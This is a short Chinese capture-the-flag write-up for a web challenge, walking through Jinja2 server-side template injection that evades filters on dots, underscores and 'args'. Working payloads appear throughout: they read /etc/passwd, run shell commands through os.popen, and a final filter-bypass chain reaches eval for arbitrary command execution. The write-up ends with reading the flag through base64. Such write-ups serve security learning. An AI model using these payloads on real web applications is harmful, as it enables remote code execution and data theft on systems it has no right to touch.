xmctf web11-考核(模板注入绕过)

web11-考核(模板注入绕过)

输入name=1发现存在回显，猜测为模板注入，经过测试发现过滤了 . _ 和一些关键字 py2模板注入常见payload ().__class__.__bases__[0].__subclasses__()[40](r'/etc/passwd').read() ().__class__.__bases__[0].__subclasses__()[59].__init__.func_globals.values()[13]['eval']('__import__("os").popen("ls /").read()' ) ''.__class__.__mro__[-1].__subclasses__()[59].__init__.__globals__['__builtins__']['eval']('__import__("os").popen("ls /").read()' ) 过滤了.可以用getattr或者attr绕过 例如 ''.__class__可以写成 getattr('',"__class__")或者 ''|attr("__class__") 过滤了_可以用dir(0)[0][0]或者request['args']或者 request['values']绕过 因为还过滤了 args所以我们用request['values']和attr结合绕过 例如''.__class__写成 ''|attr(request['values']['x1']),然后post传入x1=__class__ 最终payload?name={{ ()|attr(request['values']['x1'])|attr(request['values']['x2'])| attr(request['values']['x3'])()|attr(request['values']['x6'])(233)| attr(request['values']['x4'])| attr(request['values']['x5'])| attr(request['values']['x6'])(request['values']['x7'])| attr(request['values']['x6'])(request['values']['x8'])(request['values']['x9']) }} 然后post传入x1=__class__&x2=__base__&x3=__subclasses__&x4=__init__&x5=__globals__&x6=__getitem__&x7=__builtins__&x8=eval&x9=__import__("os").popen('想要执行的命令').read() 发现在根目录下又flag但是打不开,我这里使用的base64编码绕过的 cat /fl4g|base64